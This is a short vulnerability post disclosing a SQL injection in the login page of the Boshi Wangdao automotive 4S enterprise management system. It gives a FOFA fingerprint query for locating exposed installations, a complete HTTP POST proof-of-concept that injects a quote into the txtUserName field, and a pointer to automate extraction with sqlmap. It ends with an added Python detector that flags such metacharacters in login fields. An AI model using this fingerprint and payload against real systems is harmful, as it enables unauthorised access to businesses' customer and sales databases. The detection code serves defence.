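Vulnerability Description
The Boshi Wangdao Automotive 4S Enterprise Management System (博士王道汽车4S企业管理系统, hereafter the "Wangdao 4S system") is management software developed specifically for car sales and repair service businesses. It is the latest-generation automotive 4S enterprise management solution from Boshide Software, built on more than 10 years of experience developing management software for the automotive industry. The Wangdao 4S management system from Shijiazhuang Boshide Software Development Co., Ltd. (石家庄博士德软件开发有限公司) has a SQL injection vulnerability through which an attacker can obtain sensitive information from the database.
Vulnerability Reproduction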
FOFA:
body="PixelsPerInch" && body="AxBorderStyle" && body="DropTarget"
POC
POST / HTTP/1.1
Host:
Content-Length: 1224
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: http://
Referer: http:///
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=vdiftn34dlensux525mjv0hb
Connection: keep-alive

ScriptManager1=UpdatePanel3%7CbtnLogin&__EVENTTARGET=btnLogin&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE5OTE1NTI1NjIPZBYCZg9kFgYCAQ9kFgJmD2QWAgIBDxAPFgYeDkRhdGFWYWx1ZUZpZWxkBQhnb25nc2lubx4NRGF0YVRleHRGaWVsZAUIZ29uZ3NpbWMeC18hRGF0YUJvdW5kZ2QQFQMn5rGf5a6J5Yib5paw56eR5oqA5rG96L2m5oqA5pyv5pyN5Yqh56uZIeaxn%2BWuiei0pOWwueaxvei9puaKgOacr%2BacjeWKoeermTDlrpzlrr7otKTlsLnmsb3ovabplIDllK7mnI3liqHmnInpmZDotKPku7vlhazlj7gVAwIwMQIwMgIwMxQrAwNnZ2cWAWZkAgIPZBYCZg9kFgICAQ8QDxYGHwAFDWNhb3p1b3l1YW5feG0fAQUNY2FvenVveXVhbl94bR8CZ2QQFQoNLS3or7fpgInmi6ktLQnnjosgICDlu7oM5a6i5oi355yL5p2%2FD%2BWuh%2BmAmuS%2FoeaBr%2BWRmAblu5bkvJ8G5byg5a6BCei1lua4heemjxXmsZ%2FlronliJvmlrDnrqHnkIblkZgH546LIOW7ugnpmYjnu43lrrkVCgAJ546LICAg5bu6DOWuouaIt%2Beci%2Badvw%2FlrofpgJrkv6Hmga%2FlkZgG5buW5LyfBuW8oOWugQnotZbmuIXnpo8V5rGf5a6J5Yib5paw566h55CG5ZGYB%2BeOiyDlu7oJ6ZmI57uN5a65FCsDCmdnZ2dnZ2dnZ2dkZAIFD2QWAmYPZBYCAgEPD2QWAh4Hb25jbGljawUwX19kb1Bvc3RCYWNrKCdidG5Mb2dpbicsJycpOyB0aGlzLmRpc2FibGVkPXRydWU7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUMY2JEZWZhdWx0Q3p5BRFjYkJvc3NlZEJyb2FkY2FzdMlcKRIdaLab24GacxpNMElnfhnscvYaH3qVYCt53O4t&ddlGongSiMc=01&ddlUserName=&txtUserName=admin'&txtPassWord=1&cbBossedBroadcast=on&txtMACAddr=&__ASYNCPOST=true&
A syntax error is returned.
Run it directly with sqlmap.
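A detection-side check for the request above, as an added example that is not part of the original post: it parses the login form body and flags SQL metacharacters in the non-password fields the PoC posts. The function name, the rule list and the sample bodies are constructed for illustration; only the field names come from the request on this page.

```python
import re
from urllib.parse import parse_qs

# Non-password login fields taken from the PoC request body on this page.
# txtPassWord is left out: real passwords may legitimately contain quotes.
LOGIN_FIELDS = ("txtUserName", "ddlUserName", "ddlGongSiMc", "txtMACAddr")

# Assumed heuristics (not from the page): tokens that have no place in a
# user name, company code or MAC address field.
RULES = [
    ("quote", re.compile(r"['\"]")),
    ("comment", re.compile(r"--|/\*")),
    ("stacked", re.compile(r";")),
    ("keyword", re.compile(r"\b(union|select|waitfor|exec|xp_\w+)\b", re.I)),
]

# Constructed sample bodies, shortened to the fields that matter here.
SAMPLES = {
    "benign": "ddlGongSiMc=01&ddlUserName=&txtUserName=admin&txtPassWord=1&txtMACAddr=&__ASYNCPOST=true&",
    "poc": "ddlGongSiMc=01&ddlUserName=&txtUserName=admin'&txtPassWord=1&txtMACAddr=&__ASYNCPOST=true&",
    "encoded": "ddlGongSiMc=01&txtUserName=admin%27--&txtPassWord=1",
}


def flag_login_body(body: str) -> dict:
    """Return {field: [rule names]} for login fields that match a rule."""
    # parse_qs URL-decodes values, so %27 is inspected as a literal quote;
    # keep_blank_values keeps empty fields instead of silently dropping them.
    form = parse_qs(body, keep_blank_values=True)
    findings = {}
    for field in LOGIN_FIELDS:
        for value in form.get(field, []):
            hits = [name for name, rx in RULES if rx.search(value)]
            if hits:
                findings.setdefault(field, []).extend(hits)
    return findings


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, flag_login_body(body))
```

A match is a reason to review the request and the server response, not proof of exploitation; the fix itself belongs in the application, which should bind these fields as query parameters.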